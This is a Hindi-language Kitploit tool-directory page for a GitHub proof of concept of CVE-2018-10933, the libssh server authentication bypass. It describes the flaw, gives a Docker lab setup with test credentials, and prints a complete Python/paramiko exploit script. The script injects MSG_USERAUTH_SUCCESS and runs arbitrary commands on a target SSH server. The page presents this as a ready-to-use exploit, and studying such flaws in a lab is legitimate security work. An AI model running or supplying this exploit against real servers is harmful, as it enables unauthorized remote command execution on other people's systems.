Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Libssh-server-CVE-2018-10933 — प्रमाण-अवधारणा शोषण CVE-2018-10933 के लिए, MSG_USERAUTH_SUCCESS इंजेक्शन के माध्यम से SSH प्रमाणीकरण बायपास प्रदर्शित करता है। इसमें डॉकर सेटअप और दूरस्थ कमांड निष्पादन के लिए पायथन स्क्रिप्ट शामिल हैं। | Kitploit
उपकरण/GitHubGitHub/cyberharsh/libssh-server-cve-2018-10933
भेद्यता विश्लेषणशोषणनेटवर्क सुरक्षापेनिट्रेशन टेस्टिंगप्रमाणीकरणबाइनरी शोषण
GitHubcyberharsh/libssh-server-cve-2018-10933

Libssh-server-CVE-2018-10933

प्रमाण-अवधारणा शोषण CVE-2018-10933 के लिए, MSG_USERAUTH_SUCCESS इंजेक्शन के माध्यम से SSH प्रमाणीकरण बायपास प्रदर्शित करता है। इसमें डॉकर सेटअप और दूरस्थ कमांड निष्पादन के लिए पायथन स्क्रिप्ट शामिल हैं।

रिपॉजिटरी देखें
16 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

libssh प्रमाणीकरण बायपास भेद्यता (CVE-2018-10933)

中文版本(Chinese version)

libssh एक मल्टीप्लेटफॉर्म C लाइब्रेरी है जो क्लाइंट और सर्वर साइड पर SSHv2 प्रोटोकॉल को लागू करती है। libssh के सर्वर-साइड स्टेट मशीन में एक तर्क भेद्यता पाई गई। हमलावर प्रमाणीकरण सफल होने से पहले MSG_USERAUTH_SUCCESS संदेश भेज सकता है। इससे प्रमाणीकरण को बायपास किया जा सकता है और लक्ष्य SSH सर्वर तक पहुंच प्राप्त की जा सकती है।

संदर्भ:

  • https://www.libssh.org/security/advisories/CVE-2018-10933.txt
  • https://www.seebug.org/vuldb/ssvid-97614

सेटअप

वातावरण प्रारंभ करें:

root@kitploit:~
docker-compose up -d

वातावरण प्रारंभ होने के बाद, हम your-ip:2222 पोर्ट से कनेक्ट कर सकते हैं (खाता पासवर्ड: myuser:mypassword), जो एक वैध ssh लॉगिन है:

शोषण

https://www.seebug.org/vuldb/ssvid-97614 में दिए गए POC का हवाला देते हुए, हम भेद्यता को साबित करने के लिए निम्नलिखित स्क्रिप्ट का उपयोग कर सकते हैं।

root@kitploit:~
#!/usr/bin/env python3
import sys
import paramiko
import socket
import logging

logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
bufsize = 2048


def execute(hostname, port, command):
    sock = socket.socket()
    try:
        sock.connect((hostname, int(port)))

        message = paramiko.message.Message()
        transport = paramiko.transport.Transport(sock)
        transport.start_client()

        message.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS)
        transport._send_message(message)

        client = transport.open_session(timeout=10)
        client.exec_command(command)

        # stdin = client.makefile("wb", bufsize)
        stdout = client.makefile("rb", bufsize)
        stderr = client.makefile_stderr("rb", bufsize)

        output = stdout.read()
        error = stderr.read()

        stdout.close()
        stderr.close()

        return (output+error).decode()
    except paramiko.SSHException as e:
        logging.exception(e)
        logging.debug("TCPForwarding disabled on remote server can't connect. Not Vulnerable")
    except socket.error:
        logging.debug("Unable to connect.")

    return None


if __name__ == '__main__':
    print(execute(sys.argv[1], sys.argv[2], sys.argv[3]))

आप लक्ष्य सर्वर पर निम्नानुसार मनमाने कमांड निष्पादित कर सकते हैं:

टूल डाउनलोड करें